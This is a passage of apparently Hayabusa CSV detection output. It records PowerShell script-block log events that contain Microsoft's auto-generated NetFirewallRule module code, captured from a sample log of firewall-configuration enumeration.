Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType 
= 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"mdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] 
[bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, 
